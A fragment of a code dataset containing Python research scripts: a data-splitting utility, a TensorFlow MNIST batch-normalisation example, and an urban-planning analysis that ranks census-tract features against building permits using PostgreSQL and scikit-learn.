try:\n for i in range(int(len_larger / len_smaller)):\n accumulator.append(larger.pop())\n except Exception:\n pass\n try:\n accumulator.append(smaller.pop())\n except Exception:\n pass\n\n return accumulator\n\n\ndef make_weights_for_balanced_classes(images, nclasses):\n count = [0] * nclasses\n for item in images:\n count[item[1]] += 1\n weight_per_class = [0.] * nclasses\n N = float(sum(count))\n for i in range(nclasses):\n weight_per_class[i] = N / float(count[i])\n weight = [0] * len(images)\n for idx, val in enumerate(images):\n weight[idx] = weight_per_class[val[1]]\n return weight\n\n\ndef should_create_splits_(log_dir, dspec, args):\n if dspec.get('split_dir') and _os.path.exists(dspec.get('split_dir')) and len(list(\n _os.listdir(dspec.get('split_dir')))) > 0:\n return False\n\n dspec['split_dir'] = log_dir + _sep + 'splits'\n if _os.path.exists(dspec['split_dir']) and len(list(_os.listdir(dspec['split_dir']))) > 0:\n return False\n\n _os.makedirs(dspec['split_dir'], exist_ok=True)\n if args['num_folds'] is None and args['split_ratio'] is None:\n with open(dspec['split_dir'] + _sep + 'experiment.json', 'w') as sp:\n sp.write(_json.dumps({'train': [], 'validation': [], 'test': []}))\n return False\n\n return True\n\n\ndef list_files(dspec):\n ext = dspec.get('extension', '*').replace('.', '')\n rec = dspec.get('recursive', False)\n rec_pattern = '**/' if rec else ''\n if dspec.get('sub_folders') is None:\n path = dspec['data_dir']\n return [f.replace(path + _sep, '') for f in\n _glob.glob(f\"{path}/{rec_pattern}*.{ext}\", recursive=rec)]\n\n files = []\n for sub in dspec['sub_folders']:\n path = dspec['data_dir'] + _sep + sub\n files += [f.replace(dspec['data_dir'] + _sep, '') for f in\n _glob.glob(f\"{path}/{rec_pattern}*.{ext}\", recursive=rec)]\n return files\n\n\ndef default_data_splitter_(dspec, args):\n r\"\"\"\n Initialize k-folds for given dataspec.\n If: custom splits path is given it will use the splits from there\n else: will create new k-splits and run k-fold cross validation.\n \"\"\"\n if args.get('num_folds') is not None:\n create_k_fold_splits(\n files=list_files(dspec),\n k=args['num_folds'],\n save_to_dir=dspec['split_dir'],\n name=dspec['name']\n )\n elif args.get('split_ratio') is not None:\n create_ratio_split(\n files=list_files(dspec),\n save_to_dir=dspec['split_dir'],\n ratio=args['split_ratio'],\n name=dspec['name']\n )\n","sub_path":"easytorch/data/datautils.py","file_name":"datautils.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"260438002","text":"import os\nimport sys\nimport time\nimport tensorflow as tf\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\nmnist = read_data_sets(\"data\", one_hot=True, reshape=False, validation_size=0)\n\nclass batch_norm(object):\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum,\n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n\nif __name__ == '__main__':\n # input image\n x = tf.placeholder(tf.float32, [None, 28, 28, 1])\n # labels\n y_ = tf.placeholder(tf.float32, [None, 10])\n # weight and bias\n w1 = tf.Variable(tf.truncated_normal([784, 300], stddev=0.1))\n b1 = tf.Variable(tf.ones([300])/10.0)\n bn = batch_norm(name=\"layer1\")\n y1 = tf.nn.relu(bn(tf.matmul(tf.reshape(x, [-1, 784]), w1) + b1))\n # y1 = tf.nn.dropout(y1, 0.5) \n w2 = tf.Variable( tf.truncated_normal([300, 10], stddev=0.1))\n b2 = tf.Variable(tf.ones([10])/10.0)\n bn2 = batch_norm(name=\"layer2\")\n y = tf.nn.softmax(bn2(tf.matmul(y1, w2) + b2))\n loss = -tf.reduce_sum(y_ * tf.log(y))\n # compare\n is_correct = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n # count accuracy\n accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n # optimize\n optimizer = tf.train.GradientDescentOptimizer(0.003)\n train_step = optimizer.minimize(loss)\n # init and gpu options\n init = tf.global_variables_initializer()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n sess = tf.Session(config=config)\n sess.run(init)\n test_x, test_y = mnist.test.images, mnist.test.labels\n max_tac = 0\n for i in range(50000):\n batch_x, batch_y = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x:batch_x, y_:batch_y})\n if i % 500 == 0:\n ac, l = sess.run([accuracy, loss], feed_dict={x:batch_x, y_:batch_y})\n tac = sess.run(accuracy, feed_dict={x:test_x, y_:test_y})\n if max_tac - tac > 0.2:\n break\n if tac > max_tac:\n max_tac = tac\n print(\"accuracy is %f, loss is %f. test accuracy is %f\" % (ac, l, tac))\n\n","sub_path":"tensorflowLearning/v2_yzkk_mnist.py","file_name":"v2_yzkk_mnist.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"529313465","text":"#!/usr/bin/env python\nimport sys\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import RandomForestRegressor \nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.manifold import TSNE\nfrom collections import OrderedDict\nfrom configparser import ConfigParser\nfrom sqlalchemy import create_engine, text\nimport click\nimport json\nimport itertools\nimport re\n\ncnx_dir = os.getenv(\"CONNECTION_INFO\")\nparser = ConfigParser()\nparser.read(os.path.join(cnx_dir, \"db_conn.ini\"))\npsql_params = {k:v for k,v in parser._sections[\"disorientation\"].items()}\npsql_string = \"postgresql://{user}:{password}@{host}:{port}/{dbname}\"\nengine = create_engine(psql_string.format(**psql_params))\npd.set_option('display.width', 180)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\npd.set_option('display.max_rows', 125)\nhome = os.getenv(\"HOME\")\nout_dir = os.path.join(home,\"Dropbox/phd/dissertation/\")\nfig_home = os.path.join(home,out_dir, \"figs\")\n\ndf = pd.read_sql(\"select * from all_features\", engine)\ndf.fillna(0, inplace=True)\nx_vars = [col for col in df.columns if col not in \n ['numpermit', 'numdemo', 'geoid10', 'wkb_geometry', \n 'scale_const', 'scale_demo', 'net']]\nmin_max_scale = lambda x: (x-x.min())/(x.max() - x.min())\nstd_scale = lambda x: (x-x.mean())/float(x.std())\ndf['scale_const'] = min_max_scale(df.numpermit)\ndf['scale_demo'] = min_max_scale(df.numdemo)\n#permit column is actually net construction, but needs to be named permit\n#to run correctly in fact_heatmap function\ndf['net'] = df.scale_const - df.scale_demo\nRANDOM_STATE = 1416\n\n#fig = px.parallel_coordinates(df[x_vars+[\"net\"]], color=\"net\", labels=x_vars+[\"net\"], \n#color_continuous_scale=px.colors.diverging.Tealrose, color_continuous_midpoint=0)\n#ply.offline.plot(fig)\n\ndef add_missing(df):\n idx_cols = [\"month\", \"year\", \"name\"]\n idx = list(itertools.product(*[range(1,13),\n range(2002,2017),\n df.name.unique()]))\n df.set_index(idx_cols, inplace=True)\n df = df.reindex(idx)\n df.reset_index(inplace=True)\n df.permit.fillna(0, inplace=True)\n return df\n\n#-----------------------------------------------------------------------------\n#--------------------------- Urban Index -------------------------------------\n#-----------------------------------------------------------------------------\nsql =(\"select w.geoid10, numpermit, numdemo, ninter/sqmiland inter_density,\"\n \"totpop/sqmiland popdensity, hhinc, \"\n #\"pct_wh,pct_bl, \"\n \"pct_bl + pct_ai + pct_as + \"\n \"pct_nh + pct_ot + pct_2m pct_nonwh, \"\n \"pct_pov_tot, pct_to14 + pct_15to19 pct_u19,\"\n \"pct_20to24, pct_25to34, pct_35to49, pct_50to66, \"\n \"pct_67up, hsng_density, pct_comm, age_comm, \"\n \"pct_dev, pct_vac, park_dist, park_pcap, gwy_sqmi, \"\n \"age_bldg, mdnhprice,mdngrrent, pct_afford, \"\n \"pct_hu_vcnt, affhsgreen, foreclose,pct_own, \"\n \"pct_rent, pct_mf, age_sf, mdn_yr_lived, \"\n \"strtsdw_pct, bic_index,\"\n \"b08303002 + b08303003 + b08303004 tt_less15,\"\n \"b08303005 + b08303006 + b08303007 tt_15to29,\"\n \"b08303008 + b08303009 + b08303010 + b08303011 \"\n \"+ b08303012 + b08303013 tt30more,\"\n \"b08301002 tm_caralone, b08301010 tm_transit, \"\n \"b08301018 tm_bicycle, b08301019 tm_walk, mmcnxpsmi, \"\n \"transit_access, bic_sqmi, rider_sqmi, vmt_per_hh_ami, \"\n \"walkscore, autos_per_hh_ami, pct_canopy, \"\n \"green_bldgs_sqmi, pct_chgprop, avg_hours, \"\n \"emp_ovrll_ndx, pct_labor_force, emp_ndx, pct_unemp, \"\n \"pct_commercial, pct_arts, pct_health, pct_other, \"\n \"pct_pubadmin, pct_util, pct_mining, pct_ag, \"\n \"pct_food, pct_retail, pct_wholesale, pct_manuf, \"\n \"pct_construction, pct_waste_mgmt, pct_ed, pct_info, \"\n \"pct_transport, pct_finance, pct_realestate, \"\n \"pct_prof_services, pct_mgmt,pct_lowinc_job, \"\n \"pct_b15003016 pct_no_dip, pct_b15003017 pct_dip, \"\n \"pct_b15003018 pct_ged, pct_b15003019 pct_uni_1yr, \"\n \"pct_b15003020 pct_uni_no_deg, pct_b15003021 pct_assoc, \"\n \"pct_b15003022 pct_bach, pct_b15003023 pct_mast, \"\n \"pct_b15003024 pct_prof_deg, pct_b15003025 pct_phd, \"\n \"elem_dist, middle_dist, high_dist, \"\n \"pvt_dist, chldcntr_dist, cmgrdn_dist, frmrmkt_dist, \"\n \"library_dist, commcenter_dist,pct_medicaid, \"\n \"bpinc_pcap, hosp_dist, pol_dist, fire_dist, \"\n \"os_sqmi, pct_imp, wetland_sqmi, brnfld_sqmi, \"\n \"mata_route_sqmi, mata_stop_sqmi \"\n \"from (select count(s.fid) ninter, t.wkb_geometry, geoid10 \"\n \"from tiger_tract_2010 t, streets_carto_intersections s \"\n \"where st_intersects(s.wkb_geometry, t.wkb_geometry) \"\n \"group by geoid10, t.wkb_geometry) bg, \"\n \"(select geoid10, \"\n \"count(distinct case when const_type = 'new' \"\n \"then permit end) numpermit, \"\n \"count(distinct case when const_type = 'demo' \"\n \"then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t \"\n \"where st_within(p.wkb_geometry, t.wkb_geometry) \"\n \"group by t.geoid10) p, \"\n \"wwl_2017_tract w \"\n \"where w.geoid10 = bg.geoid10 \"\n \"and w.geoid10 = p.geoid10;\") \n\n@click.group()\ndef main():\n pass\n\n@main.command()\ndef corr_matrix():\n \"\"\"Create correlation matrix and generate heatmap\n\n \"\"\"\n from string import ascii_letters\n import numpy as np\n import pandas as pd\n import seaborn as sns\n import matplotlib.pyplot as plt\n\n X = df[x_vars]\n sns.set(style=\"white\")\n\n # Compute the correlation matrix\n corr = X.corr()\n\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n\n # Set up the matplotlib figure\n f, ax = plt.subplots(figsize=(22, 18))\n\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n # Draw the heatmap with the mask and correct aspect ratio\n sns.heatmap(corr, mask=mask, cmap=cmap, center=0,\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5}\n ,xticklabels=True, yticklabels=True\n ) \n ax.set_xticklabels(corr.index, fontsize=6)\n ax.set_yticklabels(corr.index, fontsize=6)\n plt.tight_layout()\n plt.savefig(out_dir+\"/figs/corr_matrix.png\")\n\n@main.command()\n@click.option(\"--coeff\", \"-c\", default=.8)\n@click.option(\"--update/--no-update\", default=True)\ndef get_correlated_features(coeff, update):\n \"\"\"Identify which features have highest correlation coefficient. The method\n returns a list of column names that should be excluded from an analysis,\n but also updates a table in the project database\n\n Args:\n coeff (float): threshold to identify values that should be removed\n\n \"\"\"\n corr = df[x_vars].corr()\n #correlates = set()\n correlates = list()\n for col_idx in range(len(corr.columns)):\n for row_idx in range(col_idx):\n corr_coeff = corr.iloc[col_idx, row_idx]\n if abs(corr_coeff) > coeff:\n d = {\"variable\": corr.columns[col_idx],\n \"corr_variable\": corr.index[row_idx],\n \"corr_coeff\": corr_coeff}\n correlates.append(d)\n df_corr = pd.read_json(json.dumps(correlates), orient=\"records\")\n if update:\n df_corr.to_sql(\"correlation_values\", con=engine, if_exists=\"replace\", \n index=False)\n return df_corr.variable.to_list()\n\ndef correlated_feature_list(coeff=.8):\n try:\n df_corr = pd.read_sql(\"select * from correlation_values\", engine)\n return df_corr.variable.to_list()\n except:\n corr_feats = get_correlated_features(coeff, False)\n return corr_feats\n\n@main.command()\n@click.option(\"--yname\", default=\"net\")\n@click.option(\"--n_features\", \"-nf\", default=1)\n@click.option(\"--plot/--no-plot\", default=False)\n@click.option(\"--coeff\", \"-c\", default=.8)\ndef create_feature_scores(yname, n_features, plot, coeff):\n \"\"\"Select most important features using recursive feature elimination (RFE)\n in conjunction with random forest regression and then plot the accuracy\n of the fit.\n\n References:\n\n Title: Feature Ranking RFE, Random Forest, Linear Models\n Author: Arthur Tok\n Date: June 18, 2018\n Code version: 80\n Availability: https://bit.ly/37ngDg8\n\n Title: Selecting good features – Part IV: stability selection, RFE and everything side by side\n Author: Ando Saabas\n Date: December 20, 2014\n Availability: https://bit.ly/2SGCuLx\n\n\n \"\"\"\n from sklearn.preprocessing import MinMaxScaler\n from sklearn.linear_model import LinearRegression, Ridge, Lasso\n from sklearn.ensemble import RandomForestRegressor \n from sklearn.feature_selection import RFE\n\n corr_features = correlated_feature_list(coeff)\n X = df[[col for col in x_vars if col not in corr_features]]\n cols = X.columns\n feature_rank = {}\n y = df[yname]\n accuracy = []\n\n def rank_features(ranks, names, order=1):\n minmax = MinMaxScaler()\n feature_rank = minmax.fit_transform(order*np.array([ranks]).T).T[0]\n feature_rank = map(lambda x: round(x,2), feature_rank)\n return dict(zip(names, feature_rank))\n\n #********************* Recursive Feature Elimination *********** \n #RFE with Linear Regression\n lr = LinearRegression(normalize=True)\n lr.fit(X,y)\n rfe = RFE(lr, n_features_to_select=n_features, verbose=3)\n rfe.fit(X,y)\n feature_rank[\"rfe-lr\"] = rank_features(list(map(float, rfe.ranking_)), cols,\n order=-1)\n accuracy.append([\"rfe-lr\", rfe.score(X,y)]) \n\n \n #RFE with Random Forest Regression\n rfr = RandomForestRegressor(max_features=\"sqrt\", random_state=RANDOM_STATE)\n rfr.fit(X,y)\n rfe = RFE(rfr, n_features_to_select=n_features, verbose=3)\n rfe.fit(X,y)\n feature_rank[\"rfe-rfr\"] = rank_features(list(map(float, rfe.ranking_)), cols,\n order=-1)\n accuracy.append([\"rfe-rfr\", rfe.score(X,y)])\n\n #************************* Regression *****************************\n #Linear Regression alone\n lr = LinearRegression(normalize=True)\n lr.fit(X,y)\n feature_rank[\"lr\"] = rank_features(np.abs(lr.coef_), cols)\n #Ridge Regression\n ridge = Ridge(alpha=7)\n ridge.fit(X,y)\n feature_rank[\"ridge\"] = rank_features(np.abs(ridge.coef_), cols)\n accuracy.append([\"ridge\", ridge.score(X,y)])\n\n #Lasso\n lasso = Lasso(alpha=.05)\n lasso.fit(X,y)\n feature_rank[\"lasso\"] = rank_features(np.abs(lasso.coef_), cols)\n accuracy.append([\"lasso\", lasso.score(X,y)])\n\n #Random Forest Regression alone\n rfr = RandomForestRegressor(max_features=\"sqrt\", random_state=RANDOM_STATE)\n rfr.fit(X,y)\n feature_rank[\"rfr\"] = rank_features(rfr.feature_importances_, cols)\n accuracy.append([\"rfr\", rfr.score(X,y)])\n\n r = {}\n for col in cols:\n r[col] = round(np.mean([feature_rank[method][col] \n for method in feature_rank.keys()]),2)\n methods = sorted(feature_rank.keys())\n feature_rank[\"mean\"] = r\n df_feature_rank = pd.DataFrame.from_dict(feature_rank)\n df_feature_rank.to_sql(\"feature_rank_{}\".format(yname),engine,\n if_exists='replace')\n sort_feat_rank = df_feature_rank.sort_values(\"mean\", ascending=False)\n sort_feat_rank[\"colnames\"] = sort_feat_rank.index\n #plot feature rankings\n if plot:\n f, ax = plt.subplots(figsize=(34,22))\n f = sns.barplot(x=\"mean\", y=\"colnames\", data=sort_feat_rank,\n palette=\"coolwarm\")\n f.set_yticklabels(sort_feat_rank.index, fontsize=10)\n f.set_xlabel(\"Mean Feature Importance\")\n f.set_ylabel(\"Column Name\")\n f.figure.tight_layout(pad=6.)\n# f.fig.suptitle(\"Mean Feature Importance for {}\".format(yname))\n plt.savefig(out_dir+\"/figs/bar_feat_ranking_{}_horizontal.png\".format(yname))\n return accuracy\n\n@main.command()\n@click.option(\"--coeff\", \"-c\", default=.8)\n@click.option(\"--plot/--no-plot\", default=True)\n@click.option(\"--yname\", default=\"net\")\n@click.option(\"--n-features\", \"-nf\", default=1)\n@click.option(\"--feature-score\", \"-fc\", default=0.)\ndef update_all(coeff, yname, n_features, feature_score, plot):\n \"\"\"Update `correlation_values` and `feature_rank` tables and generate new\n plots for rfr_accuracy, bar_feat_ranking \n \"\"\"\n get_correlated_features(coeff, plot)\n create_feature_scores(yname, n_features, True, coeff) \n plot_estimates(plot, feature_score, yname)\n\ndef select_features(yname=\"net\", index_only=False, min_score=.0):\n \"\"\"Select the feature rank table (feature_rank_) from postgres\n\n Args:\n yname (str): the suffix for which postgres table should be selected. \n Accepted values are net, scale_const, or scale_demo. Defaults to 'net'\n index_only (bool): False if only the index column containing the column\n names should be returned, True if all columns from the table should\n be returned. Defaults to False\n min_score (float): the minimum mean importance score that should be returned.\n Defaults to .0 for all values.\n \n Returns:\n\n \"\"\"\n cols = \"index\" if index_only else \"*\"\n params = {\"yname\": yname, \"cols\": cols, \"mean\": min_score}\n sql = \"select {cols} from feature_rank_{yname} where mean >= {mean}\"\n df = pd.read_sql(sql.format(**params), engine)\n return df\n\n@main.command()\n@click.option(\"-y\", default=\"net\")\n@click.option(\"--all\", \"-a\", is_flag=True)\ndef scatter_plot(y, all):\n \"\"\"Generates scatter plot matrix for all predictor variables against a y-value\n such as net construction, total construction or toal demolition.\n\n Args:\n y (str): column name to be used for dependent variable\n all (bool): True if all features should be included, False if correlated\n variables should be excluded\n Returns:\n None\n \"\"\"\n if not all:\n corr_cols = correlated_feature_list()\n cols = sorted([col for col in x_vars if col not in corr_cols])\n else:\n cols = sorted([col for col in x_vars])\n nrows, ncols = 9,14#14,9#10,12\n widths = [1 for col in range(ncols)]\n heights = [1 for row in range(nrows)]\n gridspec_dict={\"width_ratios\":widths,\n \"height_ratios\": heights}\n f, axes = plt.subplots(nrows, ncols, sharex=False, sharey=True,\n tight_layout=True, figsize=(34,22), \n gridspec_kw=gridspec_dict\n )\n var_pos = 0\n def plot(var_pos, row, col):\n #if y-value is for net construction, add two plots, one for net-poitive\n #construction, the other for net negative\n aspect = \"auto\"\n if y == \"net\":\n df[df.net < 0].plot.scatter(x=cols[var_pos], y=y, marker=\"<\",\n ax=axes[row,col],color=\"Purple\")\n axes[row,col].set_aspect(aspect)\n df[df.net >= 0].plot.scatter(x=cols[var_pos], y=y, marker=\">\",\n ax=axes[row,col], color=\"Green\") \n axes[row,col].set_aspect(aspect)\n else:\n color = lambda x: \"Green\" if \"const\" in x else \"Purple\"\n df.plot.scatter(x=cols[var_pos], y=y, marker=\">\",\n ax=axes[row,col], color=color(y))\n axes[row,col].set_aspect(aspect)\n for row in range(nrows):\n for col in range(ncols):\n if var_pos < len(cols):\n plot(var_pos, row, col)\n var_pos += 1\n plt.savefig(out_dir+\"/figs/scatter_plot_all_feats_{}.png\".format(y))\n plt.close()\n\ndef scatter_plot_single(y, x_label, filter_val=None):\n if filter_val:\n new_df = df[df[x_label] <= filter_val]\n else:\n new_df = df.copy()\n colors = lambda x: \"Purple\" if x < 0 or \"demo\" in y.lower() else \"Green\"\n new_df[\"color\"] = new_df[y].apply(colors)\n new_df.plot.scatter(x=x_label, y=y, color=new_df.color, s=8)\n plt.savefig(fig_home + \"/scatter_plot_{0}_{1}.png\".format(y,x_label))\n plt.close()\n\n@main.command()\n@click.option(\"--plot/--no-plot\", default=False)\n@click.option(\"--feat_score\", \"-fs\", default=.25)\n@click.option(\"--yname\", \"-y\", default=\"net\")\ndef plot_estimates(plot, feat_score, yname):\n \"\"\"Generate plots comparing different different numbers of estimators to\n determine the number to use for final model\n\n \"\"\"\n\n features = select_features(index_only=True, min_score=feat_score, yname=yname)\n #determinte number of trees in forest\n ensemble_clfs = [\n (\"RFR, max_features='sqrt'|red|-\",\n RandomForestRegressor(warm_start=True, oob_score=True,\n max_features=\"sqrt\",\n random_state=RANDOM_STATE\n )),\n (\"RFR, max_features='log2'|green|-\",\n RandomForestRegressor(warm_start=True, max_features='log2',\n oob_score=True,\n random_state=RANDOM_STATE\n )),\n (\"RFR, max_features=None|blue|-\",\n RandomForestRegressor(warm_start=True, max_features=None,\n oob_score=True,\n random_state=RANDOM_STATE\n ))]\n error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)\n\n min_estimators = 15\n max_estimators = 500\n X = df[features[\"index\"]]\n y_net = df[yname]\n for label, clf in ensemble_clfs:\n for i in range(min_estimators, max_estimators + 1):\n clf.set_params(n_estimators=i)\n clf.fit(X, y_net)\n # Record the OOB error for each `n_estimators=i` setting.\n oob_error = 1 - clf.oob_score_\n error_rate[label].append((i, oob_error))\n\n # Generate the \"OOB error rate\" vs. \"n_estimators\" plot.\n for label, clf_err in error_rate.items():\n xs, ys = zip(*clf_err)\n label, color, linestyle = label.split('|')\n plt.plot(xs, ys, label=label, color=color,\n linestyle=linestyle)\n\n if plot:\n plt.xlim(min_estimators, max_estimators)\n plt.xlabel(\"n_estimators\")\n plt.ylabel(\"OOB error rate\")\n #plt.legend(bbox_to_anchor=(0, 1.1, 1., .102), loc=\"upper center\", ncol=2)\n plt.legend(ncol=2)\n title = (\"Estimator at Feature Mean of {0} with {1} Features\\n\"\n \"for Column '{2}'\")\n plt.title(title.format(feat_score, features.shape[0], yname), pad=10)\n plt.tight_layout()\n min_score_format = int(feat_score*100)\n plt.savefig(out_dir+\"/figs/rfr_accuracy_{0}_{1}_new.png\".format(yname,min_score_format))\n plt.close()\n\ndef add_features(data, id_name):\n\n #helper method to lookup correct postgres datatype\n def dtype_lookup(column_name):\n pd_type = data[column_name].dtype.name\n dict_dtype = {\"object\":\"text\",\n \"float64\": \"float\",\n \"int64\": \"integer\"}\n return dict_dtype[pd_type]\n with engine.begin() as cnx:\n for col in [c for c in data.columns if c != id_name]:\n #add column to `all_features` if it doesn't already exist\n data_type = dtype_lookup(col)\n sql_create = (\"alter table all_features \" \n \"add column if not exists {0} {1}\"\n )\n cnx.execute(sql_create.format(col, data_type))\n #update current column in all_features with new values\n update_vals = {\"column\": col, \"id_name\": id_name}\n val_id = list(zip(data[col], data[id_name]))\n update_vals[\"values\"] = \",\".join(\"({0}, '{1}')\".format(*i) \n for i in val_id)\n sql = (\"update all_features a set {column} = n.{column} \"\n \"from (values {values}) as n ({column}, {id_name}) \"\n \"where n.{id_name} = a.{id_name}\"\n )\n cnx.execute(sql.format(**update_vals))\n\ndef more_parcels():\n\n sql = (\"with par as ( \"\n \"select wkb_geometry, parcelid, st_area(p.wkb_geometry)/43560 par_acre, \" \n \"sfcom, sfla, rmtot, res_par_perim, livunit \" \n \"from built_env.sca_shelby_parcels_2017 p \"\n \"full join (select parid, sum(sf) sfcom from \" \n \"built_env.sca_comintext group by parid) c \"\n \"on c.parid = parcelid \" \n \"full join (select parid, sum(sfla) sfla, sum(rmtot) rmtot \" \n \"from built_env.sca_dweldat group by parid) d \"\n \"on d.parid = parcelid \"\n \"full join \"\n \"(select parid, livunit, \"\n \"case when luc = '062' then st_perimeter(wkb_geometry) \"\n \"else 0 end res_par_perim \"\n \"from built_env.sca_pardat, built_env.sca_shelby_parcels_2017 \"\n \"where parcelid = parid) pa \"\n \"on pa.parid = parcelid) \"\n \"select geoid10, par_acre, sfcom, sfla, rmtot, res_par_perim, livunit \"\n \"from par, tiger_tract_2010 t \"\n \"where st_intersects(st_centroid(par.wkb_geometry), t.wkb_geometry) \"\n )\n df = pd.read_sql(sql, engine)\n df.fillna(0, inlace=True)\n grp = df.groupby(\"geoid10\").median()\n grp.reset_index(inplace=True)\n add_features(grp, \"geoid10\")\n\ndef simpson_diversity():\n \"\"\"Calculates a diversity index using Simpson's diversity index as represented\n by the formula:\n\n D = 1 - (sum(n(n-1))/N(N-1))\n where n is a total for a particular land use and N is the total land uses for\n a given geography.\n \"\"\"\n sql = (\"select luc, count(luc) ct_luc, geoid10 from built_env.sca_pardat, \"\n \"built_env.sca_shelby_parcels_2017 p, tiger_tract_2010 t \"\n \"where parid = parcelid and st_intersects(st_centroid(p.wkb_geometry), \"\n \"t.wkb_geometry) \"\n \"group by luc, geoid10\"\n )\n\n df = pd.read_sql(sql, engine)\n #calculate n\n sp_count = lambda n: n * (n -1)\n df[\"ind_count\"] = df.ct_luc.apply(sp_count)\n #calculate the diversity score, D, for all geographies\n def diversity_index(ind_count, all_count):\n return 1 - (sum(ind_count) / (sum(all_count)*(sum(all_count)-1)))\n div_score = pd.DataFrame(df.groupby(\"geoid10\").apply(\n lambda x: diversity_index(x[\"ind_count\"], x[\"ct_luc\"])))\n div_score.reset_index(inplace=True)\n div_score.rename(columns={0:\"div_idx\"}, inplace=True)\n add_features(div_score, \"geoid10\")\n\ndef parse_raster():\n \"\"\"Steps taken to create data:\n 1. Raster representation of land uses was created using gdal_rasterize in \n QGIS using a cell size of 30 map units (feet). \n 2. Tract table was split into individual shapefiles based on geoid using\n Split vector layer tool in QGIS\n 3. Split census tract shapefiles were used to split Raster created in \n step 1 into individual rasters using gdal_wrap tool within shell \n script\n TODO: \n - automate rasterization using gdal_rasterize with postgresql layer\n \n \"\"\"\n import pylandstats as pls\n \n raster_dir = \"/home/natron/temp/split_raster\"\n\n land_metrics = [\"number_of_patches\", \"patch_density\", \"largest_patch_index\",\n \"total_edge\", \"edge_density\", \"landscape_shape_index\",\n \"contagion\", \"shannon_diversity_index\"]\n all_geoids = []\n for img in os.listdir(raster_dir):\n geoid = img[8:-4]\n land = pls.Landscape(os.path.join(raster_dir, img))\n land_stats = land.compute_landscape_metrics_df()\n ls_dict = land_stats[land_metrics].to_dict(\"records\")[0]\n ls_dict[\"geoid10\"] = geoid\n all_geoids.append(ls_dict)\n df = pd.DataFrame(all_geoids)\n add_features(df, \"geoid10\")\n\ndef low_dimensional_plot():\n y = df[\"net\"]\n x = df[x_vars]\n perplex = 5\n nrows, ncols = 5,5\n idx = 1\n for row in nrows:\n for col in ncols:\n x_fit = TSNE(n_components=2, perplexity=perplex).fit_transform(x)\n plt.subplot(nrows,ncols, idx, sharex=True, sharey=True)\n plt.scatter(x_fit[:,0], x[:,1], c=y, cmap=plt.get_cmap(\"PRGn\"))\n plt.title(\"Perplexity: {}\".format(perplex))\n perplex += 5\n idx += 1\n\ndef compare_city_owned():\n \"\"\"\n By permit name:\n 0.03% city-led construction\n 96.5% city-led demolition\n By city-owned property\n 0.6 % difference in construction\n 0.2% difference in demolition \n \"\"\"\n q = (\"select * \"\n \"from (select geoid10, \"\n \"count(distinct case when const_type = 'new' then permit end) numpermit,\"\n\t \"count(distinct case when const_type = 'demo' then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t \"\n \"where st_within(p.wkb_geometry, t.wkb_geometry) {}\"\n \"group by t.geoid10) q \"\n \"order by geoid10\"\n )\n\n omit = \" and lower(p.name) not similar to '%(city of|cizty of)%' \"\n df_all = pd.read_sql(text(q.format(\"\")), engine)\n df_limit = pd.read_sql(text(q.format(omit)), engine)\n q_zoning = (\"with p as (select wkb_geometry, \"\n\t\t \"lower(regexp_replace(zoning, '[^a-zA-Z0-9]', '', 'g')) zoning \"\n\t\t \"from built_env.sca_shelby_parcels_2017, built_env.sca_pardat \"\n\t\t \"where parcelid = parid) \"\n \"select geoid10, zoning, \"\n \"count(zoning) from tiger_tract_2010 t, p \"\n \"where st_intersects(st_centroid(p.wkb_geometry), t.wkb_geometry) \"\n \"group by geoid10, zoning\" \n )\n dfz = pd.read_sql(text(q_zoning), engine)\n dfz_pivot = dfz.pivot(index=\"geoid10\", columns=\"zoning\", values=\"count\")\n dfz_pivot.fillna(0., inplace=True)\n dfz_pivot.reindex(inplace=True)\n df = df.join(dfz_pivot, on=\"geoid10\", how=\"left\")\n q_cityown = (\"with parcels as (select wkb_geometry \"\n\t \"from sca_owndat, built_env.sca_shelby_parcels_2017 pa \"\n \"where lower(concat(adrno,adrdir,adrstr,adrsuf)) <> '125nmainst' \"\n \"and parcelid=parid) \"\n \"select geoid10, \"\n \"count(distinct case when const_type = 'new' then permit end) numpermit, \"\n \"count(distinct case when const_type = 'demo' then permit end) numdemo \"\n \"from permits p, tiger_tract_2010 t, parcels \"\n \"where st_intersects(p.wkb_geometry, parcels.wkb_geometry) \"\n \"and st_intersects(p.wkb_geometry, t.wkb_geometry) \"\n \"group by geoid10\"\n )\n df_cityown = pd.read_sql(q_cityown, engine)\n# chars = \"[/\\/#/$/*///-/(/)/s]\"\n# dfz.zoning = dfz.zoning.str.replace(chars, \"\").str.lower() \n\n \n\nif __name__==\"__main__\":\n main()\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":27195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429960689","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or 